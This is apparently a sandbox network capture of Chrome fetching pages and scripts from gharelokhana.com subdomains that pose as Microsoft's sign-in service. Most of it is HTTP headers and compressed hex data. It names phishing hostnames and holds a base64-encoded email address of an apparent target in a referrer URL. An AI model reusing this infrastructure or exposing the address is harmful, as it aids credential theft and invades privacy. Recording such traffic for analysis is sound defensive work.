                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072445Z-15d6f6465c8phdgbhC1DUSvz0n00000000r0000000000f6g
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:46 UTC15572INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 86 5c f5 40 f8 e0 27 46 d0 18 04 c0 19 ec 90 00 04 80 33 52 48 32 a2 09 14 c1 7e 04 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd f5 95 95 95 95 95 99 95 99 fd 87 9b b5 3f 8d bd c0 df 13 fb 8f ea 77 21 d8 f3 f7 1f bd 9b 3d ef 47 ff e7 fd 50 c4 eb d0 2f e0 ef 92 f8 b4 0a c2 38 7a f5 d1 0d 0b 71 03 5f 35 1e e5 bb fa e3 67 c7 9b d5 7d 67 11 b8 33 31 ab ff a1 f2 f9 95 6c 2a b0 e9 d4 5d 2c f6 62 d5 83 13 3b c9 ef 60 1f 1e b8 59 e3 0f e5 a4 e0 33 0e e3 35 1e 75 47 41 69 d9 10 4e 50 9a 36 3c f8 77 d5 28 16 9d 60 af bc ff 79 ef c7 64 1a 4e e0 78 00 fc 5e 75 9f a0 f4 1b de 5e 05 fa 87 3f 87 fb 4e 08 7f 8e f6
                                                                                                                                                                                                Data Ascii: }Ms#\@'F3RH2~Qx7}'}?e#QU]Vo?w!=GP/8zq_5g}g31l*],b;`Y35uGAiNP6<w(`ydNx^u^?N
                                                                                                                                                                                                2024-12-05 07:24:46 UTC773INData Raw: e8 04 1b c0 7a 77 4c f1 70 ee 03 7e b9 52 66 00 e0 2d 4b 19 b6 30 82 b4 8c 07 10 e2 6a 41 51 4f 3c 0d 86 9c fb 90 51 1e b8 7e 38 ef ac ca 5b ce 0d e6 a8 e8 40 1c 3c 54 74 00 12 3d d5 58 6e a1 df 32 fc 96 7e 1f e6 a4 0f c0 6d c1 20 4b f4 e5 94 23 08 f2 7a 2b a7 b0 22 f9 95 e1 1b bc 5a 63 78 0f a0 e3 c1 92 39 86 02 bf 1f 40 12 07 fe c0 04 ed 43 f1 51 60 30 01 9f 99 b9 11 22 9c 9c 46 f5 21 03 4e d8 91 99 23 47 70 69 f5 43 13 bf cf 2b a3 5b 30 aa 4d 00 19 ad 61 59 30 a3 07 1c ad 07 46 55 f6 20 7e 60 b4 50 c6 37 58 14 8d 87 24 dd 1a 60 1d ef 0e ff 78 de 3c 3f 3d 3f 29 da 42 15 9f 5b 3c cd 11 b4 5f 48 e5 b0 5e 8c 8c 27 d8 05 98 35 59 15 2d 93 07 3e a7 63 10 ab 63 49 07 c0 d2 95 1b 8e 96 fc d4 b9 0c ab 80 76 df 91 f7 17 e2 c7 c6 08 08 ae 98 e1 2e 77 5a 67 fd 21
                                                                                                                                                                                                Data Ascii: zwLp~Rf-K0jAQO<Q~8[@<Tt=Xn2~m K#z+"Zcx9@CQ`0"F!N#GpiC+[0MaY0FU ~`P7X$`x<?=?)B[<_H^'5Y->ccIv.wZg!


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                18192.168.2.849765164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:46 UTC370OUTPOST /api/report?catId=GW+estsfd+SEC HTTP/1.1
                                                                                                                                                                                                Host: 43042841-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Content-Length: 586
                                                                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:24:46 UTC586OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 34 33 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6a 64 6a 6b 64 6c 65 6c 6c 65 6b 6b 66 66 2e 67 68 61 72 65 6c 6f 6b 68 61 6e 61 2e 63 6f 6d 2f 3f 6b 6d 3d 61 32 78 68 64 58 4d 75 62 57 46 6b 5a 58 4a 41 63 32 4a 76 4c 6d 4e 76 4c 6d 46 30 25 43 33 25 38 33 25 43 32 25 41 33 25 43 33 25 41 32 25 43 32 25 38 32 25 43 32 25 41 43 25 43 33 25 41 32 25 43 32 25 38 30 25 43 32 25 39 41 24 24 24 25 43 33 25 38 33 25 43 32 25 41 33 25 43 33 25 41 32 25 43 32 25
                                                                                                                                                                                                Data Ascii: [{"age":1,"body":{"elapsed_time":2433,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%
                                                                                                                                                                                                2024-12-05 07:24:47 UTC367INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:47 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                request-context: appId=cid-v1:bdc28cee-e7d0-4fb8-ae30-555e54e91d16
                                                                                                                                                                                                access-control-allow-credentials: false
                                                                                                                                                                                                access-control-allow-methods: *, GET, OPTIONS, POST
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                2024-12-05 07:24:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                19192.168.2.849766164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:47 UTC815OUTGET /Me.htm?v=3 HTTP/1.1
                                                                                                                                                                                                Host: l1ve.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                Purpose: prefetch
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:48 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:48 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Content-Length: 1432
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: max-age=315360000
                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                x-ms-route-info: C539_BL2
                                                                                                                                                                                                x-ms-request-id: 9d56dee7-6f0d-463c-8fab-fb60cbe124b9
                                                                                                                                                                                                ppserver: PPV: 30 H: BL02EPF00027B2E V: 0
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:24:48 UTC1432INData Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 57 4d 6f db 38 10 bd f7 57 d8 44 11 88 1b ae 22 d9 8e d3 ca 61 82 a2 db 45 5d 34 6d 51 75 b1 07 57 0b d0 12 65 b3 91 29 81 a4 dd 16 8e fe fb 8e be 2c 59 dd 0d dc 43 0f 89 e5 e1 cc f0 bd e1 cc a3 7c ad 43 25 32 33 30 df 33 4e 91 e1 df cc c5 17 b6 63 95 15 dd 3c 19 0c e3 ad 0c 8d 48 a5 65 08 c7 fb 38 55 d6 8e a9 81 1e 08 39 e0 d8 2c 74 40 39 fc cb 2d b3 16 9a b4 ce e0 5a 3f 0f b8 25 f1 5e c4 96 5e c8 00 2b 6e b6 4a 0e 8a 67 9b 7f cb 52 65 f4 ac 48 28 68 61 a2 fb da e6 ed 73 22 22 4f 92 24 65 11 8f bc a1 9b cf ea 50 53 84 86 2c 49 2c d1 64 20 82 b4 cf 1c c3 97 2a 8c 0e 9d 76 21 2f 71 d3 fd 21 11 b7 37 14 48 d9 21 85 20 3b a3 08 11 6e 39 38 b7 16 3d ce 0d 11 5d d2 aa 2b c0 69 bc f0 03 a2 a9 43 24 e5 76 c2 e5 ca ac 67 fa 5a ce
                                                                                                                                                                                                Data Ascii: WMo8WD"aE]4mQuWe),YC|C%2303Nc<He8U9,t@9-Z?%^^+nJgReH(has""O$ePS,I,d *v!/q!7H! ;n98=]+iC$vgZ


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                20192.168.2.849767164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:47 UTC565OUTGET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:48 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:48 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 16345
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Sat, 26 Oct 2024 01:33:48 GMT
                                                                                                                                                                                                etag: 0x8DCF55E3D91C34E
                                                                                                                                                                                                x-ms-request-id: 5d94a772-a01e-004d-7ad0-440cba000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072448Z-15b54885d9625p44hC1FRA4gmn000000084g000000005k52
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:48 UTC15572INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 86 5c f5 40 f8 e0 27 46 d0 18 04 c0 19 ec 90 00 04 80 33 52 48 32 a2 09 14 c1 7e 04 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd f5 95 95 95 95 95 99 95 99 fd 87 9b b5 3f 8d bd c0 df 13 fb 8f ea 77 21 d8 f3 f7 1f bd 9b 3d ef 47 ff e7 fd 50 c4 eb d0 2f e0 ef 92 f8 b4 0a c2 38 7a f5 d1 0d 0b 71 03 5f 35 1e e5 bb fa e3 67 c7 9b d5 7d 67 11 b8 33 31 ab ff a1 f2 f9 95 6c 2a b0 e9 d4 5d 2c f6 62 d5 83 13 3b c9 ef 60 1f 1e b8 59 e3 0f e5 a4 e0 33 0e e3 35 1e 75 47 41 69 d9 10 4e 50 9a 36 3c f8 77 d5 28 16 9d 60 af bc ff 79 ef c7 64 1a 4e e0 78 00 fc 5e 75 9f a0 f4 1b de 5e 05 fa 87 3f 87 fb 4e 08 7f 8e f6
                                                                                                                                                                                                Data Ascii: }Ms#\@'F3RH2~Qx7}'}?e#QU]Vo?w!=GP/8zq_5g}g31l*],b;`Y35uGAiNP6<w(`ydNx^u^?N
                                                                                                                                                                                                2024-12-05 07:24:48 UTC773INData Raw: e8 04 1b c0 7a 77 4c f1 70 ee 03 7e b9 52 66 00 e0 2d 4b 19 b6 30 82 b4 8c 07 10 e2 6a 41 51 4f 3c 0d 86 9c fb 90 51 1e b8 7e 38 ef ac ca 5b ce 0d e6 a8 e8 40 1c 3c 54 74 00 12 3d d5 58 6e a1 df 32 fc 96 7e 1f e6 a4 0f c0 6d c1 20 4b f4 e5 94 23 08 f2 7a 2b a7 b0 22 f9 95 e1 1b bc 5a 63 78 0f a0 e3 c1 92 39 86 02 bf 1f 40 12 07 fe c0 04 ed 43 f1 51 60 30 01 9f 99 b9 11 22 9c 9c 46 f5 21 03 4e d8 91 99 23 47 70 69 f5 43 13 bf cf 2b a3 5b 30 aa 4d 00 19 ad 61 59 30 a3 07 1c ad 07 46 55 f6 20 7e 60 b4 50 c6 37 58 14 8d 87 24 dd 1a 60 1d ef 0e ff 78 de 3c 3f 3d 3f 29 da 42 15 9f 5b 3c cd 11 b4 5f 48 e5 b0 5e 8c 8c 27 d8 05 98 35 59 15 2d 93 07 3e a7 63 10 ab 63 49 07 c0 d2 95 1b 8e 96 fc d4 b9 0c ab 80 76 df 91 f7 17 e2 c7 c6 08 08 ae 98 e1 2e 77 5a 67 fd 21
                                                                                                                                                                                                Data Ascii: zwLp~Rf-K0jAQO<Q~8[@<Tt=Xn2~m K#z+"Zcx9@CQ`0"F!N#GpiC+[0MaY0FU ~`P7X$`x<?=?)B[<_H^'5Y->ccIv.wZg!


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                21192.168.2.849773164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:48 UTC722OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                                                                                                                                                                Sec-WebSocket-Key: 1Lv6nqYKBI+cV+CyYjVvjA==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:24:49 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:49 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: eac4b1bb-d9ec-45a2-991a-84a861388201
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - SEC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:24:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                22192.168.2.849774164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:48 UTC760OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:49 UTC813INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:49 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 116430
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                                                                                                                                                                etag: 0x8DCBD5317046A2F
                                                                                                                                                                                                x-ms-request-id: 4d82a478-801e-0049-04d0-44be10000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072448Z-15b54885d966vtw7hC1FRAm6vw00000007tg00000000ea6k
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:49 UTC15566INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd 6b 5b db 48 b6 28 fc 7d ff 0a 5b bb c7 2d b5 0b 63 19 30 44 46 78 48 42 7a 98 49 02 07 c8 f4 f4 10 4f 1e 61 97 b1 12 23 79 74 e1 d2 d8 fb b7 bf 6b ad aa 92 4a b2 0c 26 dd fb 9c 0f ef f4 d3 c1 ba 94 ea 5e eb 7e d9 fc a9 fe 5f b5 9f 6a 1b eb ff 57 3b bf 38 3c bb a8 9d bc ab 5d fc e5 f8 ec 6d ed 14 ee 7e ad 7d 3c b9 38 7e 73 b4 7e 3d d8 28 fe bb 98 f8 71 6d ec 4f 79 0d 7e af bc 98 8f 6a 61 50 0b a3 9a 1f 0c c3 68 16 46 5e c2 e3 da 0d fc 8d 7c 6f 5a 1b 47 e1 4d 2d 99 f0 da 2c 0a bf f2 61 12 d7 a6 7e 9c c0 47 57 7c 1a de d5 4c a8 2e 1a d5 4e bd 28 79 a8 1d 9f 5a 2d a8 9f 43 6d fe b5 1f c0 d7 c3 70 f6 00 d7 93 a4 16 84 89 3f e4 35 2f 18 51 6d 53 b8 09 62 5e 4b 83 11 8f 6a 77 13 7f 38 a9 7d f0 87 51 18 87 e3 a4 16 f1 21 f7 6f
                                                                                                                                                                                                Data Ascii: k[H(}[-c0DFxHBzIOa#ytkJ&^~_jW;8<]m~}<8~s~=(qmOy~jaPhF^|oZGM-,a~GW|L.N(yZ-Cmp?5/QmSb^Kjw8}Q!o
                                                                                                                                                                                                2024-12-05 07:24:49 UTC16384INData Raw: e5 81 6f 1a 88 9e 58 25 c2 ac 84 e2 39 6d ac 49 a1 a5 bd 69 3f ec 3f f5 3a 93 4e 23 4d 58 59 50 b3 db 2e 14 c6 f1 60 a8 76 39 a2 ca 7d 0a c4 6c 46 7b 28 72 48 0c 1b 29 1f 49 83 69 74 84 3e 47 59 e0 42 9b b2 5c ca 98 89 5e 36 a7 a4 0f a8 17 38 0d 53 1c 3e 97 dc 1a 24 8a 0d 4a a7 01 95 50 e2 5c ba e4 79 91 1d cc fc 76 23 bb 17 59 49 55 e3 fb 1d 24 72 d5 75 be 53 62 b7 c3 d2 4d f8 e3 e1 9f 08 fe 94 d8 cb 4c b2 60 93 d3 a2 08 88 dd c2 8c 74 9f 8e 83 c4 ee be 3e 32 f9 4f b1 b5 a0 9d 4a e3 1e bb 1b c2 01 c9 77 a3 9e bf 9f 52 88 74 4a 42 90 30 df 82 5a d0 06 7b 03 ab 1b c3 71 f0 37 c6 a2 a7 e2 09 4c c4 d8 f5 2d 06 8f 9b b6 66 2a 5d 1b ff 14 d3 96 df 40 23 45 2c e6 6f b8 f8 2d c3 e6 72 1b e8 a8 e9 1d a4 c2 29 72 c3 23 61 49 cf 47 e7 27 7f 63 23 57 ee 4e 51 25 3b
                                                                                                                                                                                                Data Ascii: oX%9mIi??:N#MXYP.`v9}lF{(rH)Iit>GYB\^68S>$JP\yv#YIU$ruSbML`t>2OJwRtJB0Z{q7L-f*]@#E,o-r)r#aIG'c#WNQ%;
                                                                                                                                                                                                2024-12-05 07:24:49 UTC10657INData Raw: e7 35 b3 20 34 dd 6c 5b 0d 23 c5 92 bb a1 e1 15 06 9c d6 98 ca d8 18 90 d7 dc e5 ea 82 7d ef 09 95 45 f9 9b a8 2c 50 ab 22 54 16 07 ad ed 7f 4f 95 05 39 db b1 52 4f 3d 7c a6 5a 52 28 25 95 26 2d d3 6a b4 05 6d 70 f8 b5 b5 c1 c0 d7 03 43 25 ce 84 c4 47 f9 32 80 36 71 44 13 e5 59 a1 c8 da 20 11 59 35 1d 81 6d f1 2b 6a f5 ac 27 40 2f 28 86 df 62 1f f3 6f b7 3c 9f c2 e3 66 68 ea 81 e7 cd 61 4e 43 da 42 bb 8e b0 85 86 42 7e f2 cf 80 bb 44 04 66 36 07 4b 4d 46 51 68 32 c1 4f 92 a1 8f 45 af ca 92 ca 30 00 73 38 77 93 af 7e 82 38 80 66 ee ee ee 3e 1e 0d f8 b1 fd 02 59 5a 3c 2d 7b 1e 99 c6 a8 18 a5 7d e7 d3 a7 21 cc 63 f3 e7 fc 53 3e 01 6c 35 fa f4 09 53 f4 c5 6e dd 0b 86 be 25 2e f0 49 c0 ba 41 ef 08 2a fa 01 a1 c5 e3 52 af 07 51 e6 3b db cd ed fd 66 db 61 d7 e8
                                                                                                                                                                                                Data Ascii: 5 4l[#}E,P"TO9RO=|ZR(%&-jmpC%G26qDY Y5m+j'@/(bo<fhaNCBB~Df6KMFQh2OE0s8w~8f>YZ<-{}!cS>l5Sn%.IA*RQ;fa
                                                                                                                                                                                                2024-12-05 07:24:50 UTC16384INData Raw: 25 a5 62 ee a3 02 5d 68 4a cf 1e 36 0c a0 1a c7 25 b6 54 3f d4 16 1f 26 f7 ac 08 aa b3 d1 01 63 2b 93 88 2a 7d 89 4b 77 b1 3f d3 6d 94 fa 13 d1 56 f8 91 6d 29 eb e7 b9 b2 29 c9 16 47 81 c6 77 8b cb b8 30 17 58 84 f9 82 28 c0 f9 a6 51 34 be 51 36 6a 48 f6 22 13 0f 23 f9 a6 32 87 b0 a8 0e bf 20 c2 b6 38 5c dc 2d bb 6f 7a d3 2f 06 dd 05 d4 f0 43 ba 16 4d 23 b4 aa 5c a3 25 02 54 74 79 8f a8 a1 d2 b7 b8 ff 96 59 94 88 be b9 a7 16 e1 7c 29 e0 0f f2 6a ea 41 19 30 0b 8f 93 d4 6c 3c cc f5 79 8e 5d a9 4b 34 c6 09 eb f1 3e be 8e d2 b2 c0 50 12 b4 52 14 4b 42 45 ac 9b 57 f0 41 e5 fb e1 34 0a b3 55 5b 90 59 dd d1 36 4e 77 ac dc df 54 09 cc a7 c5 d9 20 ac 19 3f 3e ae a3 d5 d4 e2 17 99 d1 0a ab 7e 6e a8 5a 33 2a 31 34 aa c6 2b 0e 5e 64 1f 6e 57 b2 2b 08 bb 53 a8 30 9f
                                                                                                                                                                                                Data Ascii: %b]hJ6%T?&c+*}Kw?mVm))Gw0X(Q4Q6jH"#2 8\-oz/CM#\%TtyY|)jA0l<y]K4>PRKBEWA4U[Y6NwT ?>~nZ3*14+^dnW+S0
